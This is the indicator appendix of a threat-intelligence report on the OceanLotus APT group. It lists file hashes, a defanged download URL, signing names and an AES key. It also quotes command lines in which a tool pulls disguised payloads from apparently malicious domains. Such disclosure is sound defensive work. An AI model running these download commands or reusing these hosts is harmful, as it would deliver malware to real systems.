| a76be0181705809898d5d7d9aed86ee8 |
| 2785311085b6ca782b476d9c2530259c |
| 60501717f81eacd54facecf3ebadc306 |
| 3d7cd531d17799832e262eb7995abde6 |
| c7931fa4c144c1c4dc19ad4c41c1e17f |
| Correlated files: |
| 5c9ef8b5263651a08ea1b79057a5ee28 |
| b858c08cf7807e462ca335233bd83fe7 |
| c313f8a5fd8ca391fc85193bc879ab02 |
| 473fdfefa92725099ca87e992edbc92c |
| 02cec2f17a7910b6fa994f340bbbc297 |
| dd5ae0c0a7e17d101f570812fec4e5e4 |
| 90e5ff68bf06cb930ed8c040139c4650 |
| 6db450c4c756071ecafff425d6183d7d |
| cb39e2138af92c32e53c97c0aa590d48 |
| 8e13895504e643cd8e0e87377b25bd6b |
| d3c27f779d615a1d3a35dff5e9561eb0 |
| 27425360d18feea54860420006ea9833 |
| cf0142da12509f544a59093495c3a6dd |
| b1df440e5dd64ffae9f7e792993f2f4c |
| 878fa022bd5e5caf678fe8d728ce42ee |
| f78be074f6bc67a712e751254df5f166 |
| e2aed850c18449a43886fc79b342132f |
| 74b456adf2ae708789fb2d34ecccb954 |
| 72263750df84e24fe645206a51772c88 |
| 3a574c28beca4f3c94d30e3cf3979f4c |
| ee836e0f7a40571523bf56dba59898f6 |
| f6068b672a19ce14981df011a55081e4 |
| 00ac0d7337290b74bdd7f43ec4a67ddb |
| Correlated PE files: |
| 2f9af6b9d73218c578653d6d9bd02d4d |
| c9d29501410e19938cd8e01630dc677b |
| URL: |
| http[:]//download-attachments.s3.amazonaws.com/db08b565038ac83e89e7b55201479f37ea49e525/f0c6ea8e-d2f8-445f-b649-57808b2015b7 |
| Sample characteristics |
| ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://word.webhop.info/blak32.gif -t 200000 |
| ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://syn.servebbs.com/kuss32.gif -t 200000 |
| UA:\Code\Nb2VBS\Request\PostData32.exe -u https://ristineho.com/threex32.png -t 60000 |
| XA:\Code\Macro_NB2\Request\PostData32.exe -u https://cortanasyn.com/kirr32.png -t 200000 |
| C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe |
| {C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe -u https://office.allsafebrowsing.com/fdsw32.png -t 240000 |
| SecurityAndMaintenance_Error.bin |
| d:\work\malware\vinacap\SecurityAndMaintenance_Error.png |
| d:\work\forensics\vinacap\dfir\nhule\files\SecurityAndMaintenance_Error.png |
| D:\work\forensics\vinacap\DFIR\Nhule\files\SecurityAndMaintenance_Error.png |
| MAC signatures: |
| Melinda Cline (P74QRJXB2F) |
| DAVID DOWELL (B5YH6VDVRE) |
AES KEY:
| Decrypted String | 4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1 |
| Encrypted Packet | 07E74FF2CE9688C8F79B91AB32C95D11C140D3AC |
References
[1] https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/
[2] https://twitter.com/blackorbird/status/1118399331688570880
[4] https://twitter.com/blackorbird/status/1086186184768815104
[5] https://twitter.com/RedDrip7/status/1119204830633848834
Appendix
RedDrip Team
RedDrip Team of QiAnXin (Formly SkyEye Team), founded in 2015, focuses on the research of APT attacks. As the first team of revealing OceanLotus (APT-C-00) attack, RedDrip Team is also a key part of QiAnXin Threat Intelligence Center.
Our team has security analysts, developers, covering full cycle of threat intelligence operation: data sourcing, processing, analyzing, and correlation. Our threat intelligence supports QiAnXin products and third party products.
Relying on leading security data capacity and security expertise, we found several noteworthy APT campaigns, including OceanLotus.
Follow us in WeChat
